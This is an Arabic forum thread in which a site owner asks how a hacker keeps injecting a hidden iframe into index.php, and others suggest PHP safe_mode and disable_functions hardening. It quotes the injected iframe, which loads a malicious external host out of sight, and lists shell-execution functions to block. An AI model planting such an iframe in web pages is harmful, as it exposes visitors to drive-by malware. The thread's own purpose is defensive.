 |
السلام عليكم
عندي منتدى ، بعد كل فتره يدخل هكر ويضيف كود في صفحة index.php ، يقوم باضافة هذا الكود
سؤال كيف قام هذا المخترق بالتعديل على الملف؟<iframe src="http://combinebet.cn:8080/index.php" width=131 height=118 style="visibility: hidden"></iframe>
__________________
انا أريد وأنت تريد والله يفعل مايريد!
ادخل السي بانيل وشوف اصدار الـ php عندك كام ؟
في ثغره خطيره في اصدار 5.2.9 مقرفه تتخطى السيف مود والدوال
الله يعيين حاول تأكد عليه
مرحبا
اول شي اشكرك على ردك وأحييك على حبك لمساعدة الناس وعسى الله يرزقك ويوفقك.
بالنسبة لإصدار البي اتش بي الذي لدي هو 5.2.8 هل هذا الاصدار موجوده فيه الثغره القاتلة؟
__________________
انا أريد وأنت تريد والله يفعل مايريد!
اللهم آمين .. جميعاً يارب
اكيد بس تأكد من وضعية السيف مود عندك هي off ولا On
ثانياً الـ Disable Function وماهي الدوال المغلقه
اخيراً شوف المود سيكيورتي والجدار الناري وتحديثاتهم
كل هذا تقدر تعرفه من مستضيفك طبعاً
أطيب التحيات
اخوي انا مفعل السيف مود لكن دخلت قبل شوي ووجدت التالي:
Directive Local Value Master Value
safe_mode Off On
كما تلاحظ ان السيف مود في Local Value غير مفعل، وايضا Local Value تطغى على قيمة Master Value
وجدت هذه النتيجة في كل المواقع
وحاولت ان اجد السبب لكن للأسف ماعرفت السبب الذي يجعل القيمة تتغير، لم اجد اي ملف .htaccess معدل عليه.
استخدمت الأمر:
لإيجاد الملفات التي تم تتغير السيف مود فيها لكن للاسف لم تظهر نتائجfind . | xargs grep 'php_admin_flag safe_mode'
__________________
انا أريد وأنت تريد والله يفعل مايريد!
اخوي ذا فيروس ؟ افريم بجهازك هل اخترق المنتدى ؟ ولا بس فيروس ؟
قمت بتفعيل السيف مود
__________________
انا أريد وأنت تريد والله يفعل مايريد!
السيف مود والفانكشن يتم تفعيلهم من خلال الـ php.ini
ماهو رأيك في حظر هذه الدوال؟ هل يستخدم منها شي ببالمنتدى؟
كود PHP:disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
__________________
انا أريد وأنت تريد والله يفعل مايريد!
ففي 2009
هي الأفضلكود PHP:disable_functions = dl,passthru, pfsockopen,system,exec,passthru,popen,shell_exec,proc_close,proc_open,proc_nice, proc_terminate, proc_get_status,posix_getpwuid,posix_uname,openlog,syslog,ftp_exec,posix_uname,posix_getpwuid,posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid,get_current_user,getmyuid,getmygid,listen,chgrp,chmod,apache_note,apache_setenv,apache_child_terminate,closelog,debugger_off,debugge_on,ini_restore,imap,tempnam, netscript,copy,curl_init,curl_exec,escapeshellcmd,escapeshellarg,tmpfile,cmd,backtick,virtual,show_sourc,show_source,pclose,pcntl_exec,hell-exec,fpassthru,crack_check, crack_closedict,crack_getlastmessage,crack_opendict,leak,psockopen,php_ini_scanned_files,php_uname,print_r
يعطيك العافيه حبيبي
__________________
انا أريد وأنت تريد والله يفعل مايريد!
السلام عليكم
اخوي هذا يضيف هذا الكود الى كل ملفات index في كل موقعك
يعني اي فولدر فيه index تاكد ان هذا الكود فيه
مثل inxed.php او index.htm
الحل بارك الله فيك
غير كلمه السر حقت الموقع وليست المنتدى
وغير الملفات المصابه بهذا الكود
وما تشوف شر
ضوابط المشاركة
رد مع اقتباس
